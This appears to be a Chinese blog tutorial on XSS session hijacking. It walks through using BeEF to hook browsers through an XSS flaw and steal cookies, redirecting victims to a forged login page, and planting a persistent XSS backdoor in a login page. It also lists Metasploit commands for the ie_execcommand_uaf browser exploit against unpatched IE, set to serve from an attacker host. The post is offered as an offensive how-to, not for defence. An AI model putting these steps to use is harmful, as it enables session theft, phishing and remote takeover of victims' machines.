zoukankan      html  css  js  c++  java
  • XSS之会话劫持

    1.搭建XSS利用平台beef

    启动beef

    kali自带beef工具,第一次启动beef,使用命令:

    beef-xss

    然后提示输入密码即可,自行安装。

    安装完成后查看配置文件: /usr/share/beef-xss/config.yaml  获得账户密码

     启动beef后会给出网址,提供我们管理会话:

    2.利用XSS获取cookie

    终端启动beef时,会出现XSS攻击代码,将代码放到存在XSS的地方,将会获得会话

    beef攻击代码:

     成功界面:

     获取cookie:

     3.XSS会话劫持

    beef提供会话劫持功能,指定要跳转的网页即可重定向到指定网页

    执行后将跳转到指定网页

    可以指定网址为自己伪造的登录页面,完成一次社工。

    4.XSSgetshell

    配合msf获取系统权限(ie低版本且未打补丁)

    msf执行:
    use exploit/windows/browser/ie_execcommand_uaf   //选择攻击模块
    show options   //查看选项
    set srvhost 192.168.51.132    //设定攻击主机
    set srvport 8888   //设定端口
    set uripath /    //设定路径为根
    exploit  //攻击

    完成以上步骤后,重定向被劫持的ie浏览器到攻击IP:8888。如没有打补丁且小于等于V9一般可以控制。

    5.XSS后门

    主要原理就是长期潜伏与网站页面中,不管如何修改密码,当点击存在隐藏XSS的页面将返回cookie。

    所以可以给登录页面中插入一条XSS语句,当每次登陆后都能够获得cookie

  • 相关阅读:
    小明铺路
    Python库-BeautifulSoup
    Python库-re(正则表达式)
    cpp分解质因数
    cf Double Happiness(判断是否为素数且为4k+1型)
    ACM-世界岛旅行
    C#(.Net)中调用Sql sever汉字字符串显示为?问号
    如何配置Python环境
    记账软件——第三天
    记账软件——第二天
  • 原文地址:https://www.cnblogs.com/Shepherd-boy/p/15074481.html
Copyright © 2011-2022 走看看